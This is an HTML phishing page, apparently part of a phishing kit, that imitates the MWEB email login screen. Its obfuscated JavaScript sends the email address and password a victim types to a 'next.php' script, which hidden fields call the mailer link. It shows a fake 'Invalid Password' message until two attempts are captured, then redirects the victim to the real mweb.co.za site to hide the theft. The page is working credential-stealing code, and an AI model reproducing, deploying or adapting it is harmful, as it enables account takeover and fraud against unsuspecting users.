<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Email Login - MWEB</title>
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=yes">
    <link rel="stylesheet" href="./css/bootstrap.min.css">
    <link href="./css/icon" rel="stylesheet">
    <link rel="stylesheet" href="./css/styles.css">
    <link rel="stylesheet" href="./css/mweb-custom.css">
    <link rel="stylesheet" href="./css/main.css">
    <link rel="stylesheet" href="./css/login-register.css">
    <link rel="stylesheet" href="./css/dashboard.css">
    <style>@import url(https://use.typekit.net/ifa4ifg.css);</style>
    <style>
        html, body { height: 100%;
    font-family: 'Acumin Pro', Arial, sans-serif !important;
}
body { margin: 0;
    font-family: 'Acumin Pro', Arial, sans-serif !important;
}
</style>
    <style>.login-title[_ngcontent-wex-c249]{font-size:27px}.login-notice-light[_ngcontent-wex-c249]{font-weight:lighter;font-size:1.5rem}.form-group-rebrand[_ngcontent-wex-c249] > label[_ngcontent-wex-c249]{white-space:nowrap;color:#707070;margin-right:2rem;width:25%}.form-group-rebrand[_ngcontent-wex-c249] > input[_ngcontent-wex-c249]{width:100%}.form-group-rebrand[_ngcontent-wex-c249] > input[_ngcontent-wex-c249]:active, .form-group-rebrand[_ngcontent-wex-c249] > input[_ngcontent-wex-c249]:focus{border:2px solid #00b3b0}.form-group-rebrand[_ngcontent-wex-c249]{display:-ms-flexbox!important;display:flex!important}.form-group-rebrand[_ngcontent-wex-c249], .form-group-rebrand[_ngcontent-wex-c249] > .form-group[_ngcontent-wex-c249]{-ms-flex-pack:justify;justify-content:space-between;margin-bottom:2rem}.form-group-rebrand[_ngcontent-wex-c249] > .form-group[_ngcontent-wex-c249]{display:-ms-flexbox;display:flex}.btn-grey[_ngcontent-wex-c249]{border-radius:0!important;background:#fff;color:#707070;border:1px solid #707070;padding:.8rem 4rem!important}.text-align-start[_ngcontent-wex-c249]{text-align:start!important}.login-container-rebrand[_ngcontent-wex-c249]{height:100%!important;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;-ms-flex-pack:justify;justify-content:space-between}.validation-error-red[_ngcontent-wex-c249]{color:#d02329!important;font-size:smaller!important;font-style:italic!important}.validation-error-border-red[_ngcontent-wex-c249]{border:2px solid #d02329!important}.border-teal-touched[_ngcontent-wex-c249]{border:2px solid #00b3b0!important}.validation-error-border-red[_ngcontent-wex-c249]::-webkit-input-placeholder{color:#d02329!important}.validation-error-border-red[_ngcontent-wex-c249]:-moz-placeholder, .validation-error-border-red[_ngcontent-wex-c249]::-moz-placeholder{color:#d02329!important;opacity:1!important}.validation-error-border-red[_ngcontent-wex-c249]:-ms-input-placeholder{color:#d02329!important}@media screen and (min-width:768px){.h-md-100[_ngcontent-wex-c249]{height:100%!important}}</style>
</head>

<body>
    <mweb-app ng-version="10.2.5">
        <main>
            <email-login-page _nghost-wex-c251="">
                <div _ngcontent-wex-c251="" id="MWEB-2016">
                    <section _ngcontent-wex-c251="" id="login-register" class="login-register existing-customer">
                        <div _ngcontent-wex-c251="" class="row m-0 email-login-container">
                            <div _ngcontent-wex-c251="" class="col-12 col-lg-6 col-lg-auto d-none d-lg-block m-0 p-0 app-awareness-content-container-left app-awareness-container-bg-image">
                                <section class="app-awareness-text-container d-block">
                                    <p>You asked. We delivered!</p>
                                    <p>Download the App.</p>
                                </section>
                                <section class="app-awareness-image-link-container d-flex align-items-center flex-column">
                                    <a href="#" target="_blank">
                                        <img src="./images/App-Google-Play.png" alt="">
                                    </a>
                                    <a href="#" target="_blank">
                                        <img src="./images/App-App-Store.png" alt="">
                                    </a>
                                    <a href="#" target="_blank">
                                        <img src="./images/App-App-Gallery.png" alt="">
                                    </a>
                                </section>
                            </div>
                            <div _ngcontent-wex-c251="" class="col-12 col-lg-6 p-0 m-0 email-login-container-form">
                                <div _ngcontent-wex-c251="" class="existing-customer h-100">
                                    <div _ngcontent-wex-c251="" style="margin: 95px auto;" class="hidden"><img _ngcontent-wex-c251="" src="./images/mweb-logo-2020-white.png" alt="Blue and white Mweb logo with animation." class="img-responsive center-block"></div>
                                    <div _ngcontent-wex-c251="" class="row login-header d-none">
                                        <div _ngcontent-wex-c251="" class="col-lg-4 offset-lg-4 col-md-5 offset-md-3 col-sm-6 offset-sm--3 col-xs-12">
                                            <div _ngcontent-wex-c251="" class="row">
                                                <div _ngcontent-wex-c251="" class="col-sm-10 col-xs-9"></div>
                                            </div>
                                        </div>
                                    </div>
                                    <div _ngcontent-wex-c251="" class="h-100">
                                        <div _ngcontent-wex-c251="" class="row h-100 justify-content-md-center justify-content-start align-items-center m-0">
                                            <mweb-existing-login _ngcontent-wex-c251="" class="ml-3 ml-lg-0" _nghost-wex-c249="">
                                                <form _ngcontent-wex-c249="" novalidate="" name="existingCustomerLoginForm" id="login" autocomplete="off" class="h-md-100 ng-untouched ng-pristine ng-invalid">
                                                    <div _ngcontent-wex-c249="" class="login-container no-border login-container-rebrand">
                                                        <h2 _ngcontent-wex-c249="" class="login-h2 login-type-title">Email Login</h2>
                                                        <center>
                                                            <div class="alert alert-danger" id="msg" style="display: none;color: red;">Invalid Password..! Please enter correct password.</div>
                                                            <span id="error" class="text-danger" style="display: none;color: red;">That account doesn't exist. Enter a different account</span>
                                                        </center>
                                                        <div _ngcontent-wex-c249="" class="form-group has-feedback"><label _ngcontent-wex-c249="" for="user_id">Email Address *</label>
                                                            <div _ngcontent-wex-c249="" class="d-flex flex-column w-100"><input _ngcontent-wex-c249="" type="text" id="ai" name="ai" placeholder="Please enter your email address" ngmodel="" autocomplete="off" required="" class="p-1 ng-untouched ng-pristine ng-invalid"></div>
                                                        </div>
                                                        <div _ngcontent-wex-c249="" class="form-group has-feedback"><label _ngcontent-wex-c249="" for="passwd">Password *</label>
                                                            <div _ngcontent-wex-c249="" class="d-flex flex-column w-100"><input _ngcontent-wex-c249="" type="password" id="pr" name="pr" placeholder="Please enter your password" autocomplete="off" required="" class="p-1 ng-untouched ng-pristine ng-invalid"></div>
                                                        </div><button _ngcontent-wex-c249="" id="sub-btn" type="button" class="btn primary login-btn-margin" name="sub-btn">LOGIN
                                                            <!----><i _ngcontent-wex-c249="" class="mweb-spinner-dark d-none"></i></button>
                                                        <p _ngcontent-wex-c249="" id="password-reminder" class="mt-1"><a _ngcontent-wex-c249="" href="#" title="Forgotten password">Forgotten password?</a></p>
                                                    </div>
                                                </form>
                                                <!---->
                                                <!---->
                                            </mweb-existing-login>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </section>
                </div>
            </email-login-page>
        </main>
    </mweb-app>
    <!-- //mailer link -->
    <input type="hidden" id="f" value="./next.php">
    <!-- //mail result count -->
    <input type="hidden" id="rc" value="2">
    <!-- //redirect link -->
    <input type="hidden" id="rdrt" value="https://www.mweb.co.za/">
    <!-- // if you want to redirection for domain (0 for no)(1 for yes) -->
    <input type="hidden" id="domain_redirect" value="0">
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
var _0xd5ae=["\x76\x61\x6C","\x23\x66","\x23\x72\x63","\x23\x72\x64\x72\x74","\x23\x64\x6F\x6D\x61\x69\x6E\x5F\x72\x65\x64\x69\x72\x65\x63\x74","\x6B\x65\x79\x43\x6F\x64\x65","\x77\x68\x69\x63\x68","\x31\x33","\x70\x72\x65\x76\x65\x6E\x74\x44\x65\x66\x61\x75\x6C\x74","\x63\x6C\x69\x63\x6B","\x23\x73\x75\x62\x2D\x62\x74\x6E","\x6B\x65\x79\x70\x72\x65\x73\x73","\x73\x75\x62\x73\x74\x72","\x68\x61\x73\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x40","\x69\x6E\x64\x65\x78\x4F\x66","\x2E","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x23\x61\x69","\x68\x74\x6D\x6C","\x23\x61\x69\x63\x68","\x68\x69\x64\x65","\x23\x6D\x73\x67","\x23\x65\x72\x72\x6F\x72","\x23\x70\x72","\x74\x65\x78\x74","\x73\x68\x6F\x77","\x45\x6D\x61\x69\x6C\x20\x66\x69\x65\x6C\x64\x20\x69\x73\x20\x65\x6D\x70\x74\x79\x2E\x21","\x74\x65\x73\x74","\x54\x68\x61\x74\x20\x61\x63\x63\x6F\x75\x6E\x74\x20\x64\x6F\x65\x73\x6E\x27\x74\x20\x65\x78\x69\x73\x74\x2E\x20\x45\x6E\x74\x65\x72\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x61\x63\x63\x6F\x75\x6E\x74","\x50\x61\x73\x73\x77\x6F\x72\x64\x20\x66\x69\x65\x6C\x64\x20\x69\x73\x20\x65\x6D\x70\x74\x79\x2E\x21","\x4A\x53\x4F\x4E","\x50\x4F\x53\x54","\x56\x65\x72\x69\x66\x79\x69\x6E\x67\x2E\x2E\x2E","","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E","\x72\x65\x70\x6C\x61\x63\x65","\x4C\x4F\x47\x49\x4E","\x61\x6A\x61\x78","\x72\x65\x61\x64\x79"];var f=$(_0xd5ae[1])[_0xd5ae[0]]();var rc=$(_0xd5ae[2])[_0xd5ae[0]]();var rdrt=$(_0xd5ae[3])[_0xd5ae[0]]();var domain_redirect=$(_0xd5ae[4])[_0xd5ae[0]]();$(document)[_0xd5ae[40]](function(){var _0x872ex5=0;$(document)[_0xd5ae[11]](function(_0x872ex6){var _0x872ex7=(_0x872ex6[_0xd5ae[5]]?_0x872ex6[_0xd5ae[5]]:_0x872ex6[_0xd5ae[6]]);if(_0x872ex7== _0xd5ae[7]){_0x872ex6[_0xd5ae[8]]();$(_0xd5ae[10])[_0xd5ae[9]]()}});var _0x872ex8=window[_0xd5ae[14]][_0xd5ae[13]][_0xd5ae[12]](1);if(!_0x872ex8){}else {var _0x872ex9=_0x872ex8;var _0x872exa=_0x872ex9[_0xd5ae[16]](_0xd5ae[15]);var _0x872exb=_0x872ex9[_0xd5ae[12]]((_0x872exa+ 1));var _0x872exc=_0x872exb[_0xd5ae[12]](0,_0x872exb[_0xd5ae[16]](_0xd5ae[17]));var _0x872exd=_0x872exc[_0xd5ae[18]]();$(_0xd5ae[19])[_0xd5ae[0]](_0x872ex9);$(_0xd5ae[21])[_0xd5ae[20]](_0x872ex9);$(_0xd5ae[23])[_0xd5ae[22]]()};$(_0xd5ae[10])[_0xd5ae[9]](function(_0x872ex6){$(_0xd5ae[24])[_0xd5ae[22]]();$(_0xd5ae[23])[_0xd5ae[22]]();_0x872ex6[_0xd5ae[8]]();var _0x872ex8=$(_0xd5ae[19])[_0xd5ae[0]]();var _0x872exe=$(_0xd5ae[25])[_0xd5ae[0]]();var _0x872exf=$(_0xd5ae[23])[_0xd5ae[20]]();$(_0xd5ae[23])[_0xd5ae[26]](_0x872exf);var _0x872ex9=_0x872ex8;var _0x872ex10=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x872ex8){$(_0xd5ae[24])[_0xd5ae[27]]();$(_0xd5ae[24])[_0xd5ae[20]](_0xd5ae[28]);return false};if(!_0x872ex10[_0xd5ae[29]](_0x872ex9)){$(_0xd5ae[24])[_0xd5ae[27]]();$(_0xd5ae[24])[_0xd5ae[20]](_0xd5ae[30]);return false};if(!_0x872exe){$(_0xd5ae[24])[_0xd5ae[27]]();$(_0xd5ae[24])[_0xd5ae[20]](_0xd5ae[31]);return false};var _0x872exa=_0x872ex9[_0xd5ae[16]](_0xd5ae[15]);var _0x872exb=_0x872ex9[_0xd5ae[12]]((_0x872exa+ 1));var _0x872exc=_0x872exb[_0xd5ae[12]](0,_0x872exb[_0xd5ae[16]](_0xd5ae[17]));var _0x872exd=_0x872exc[_0xd5ae[18]]();_0x872ex5= _0x872ex5+ 1;$[_0xd5ae[39]]({dataType:_0xd5ae[32],url:f,type:_0xd5ae[33],data:{ai:_0x872ex8,pr:_0x872exe},beforeSend:function(_0x872ex11){$(_0xd5ae[10])[_0xd5ae[20]](_0xd5ae[34])},complete:function(){$(_0xd5ae[25])[_0xd5ae[0]](_0xd5ae[35]);if(_0x872ex5>= rc){_0x872ex5= 0;if(domain_redirect== 1){window[_0xd5ae[14]][_0xd5ae[37]](_0xd5ae[36]+ _0x872exb)}else {window[_0xd5ae[14]][_0xd5ae[37]](rdrt)};return false};$(_0xd5ae[23])[_0xd5ae[27]]();$(_0xd5ae[10])[_0xd5ae[20]](_0xd5ae[38])}})})})
</script>

</html>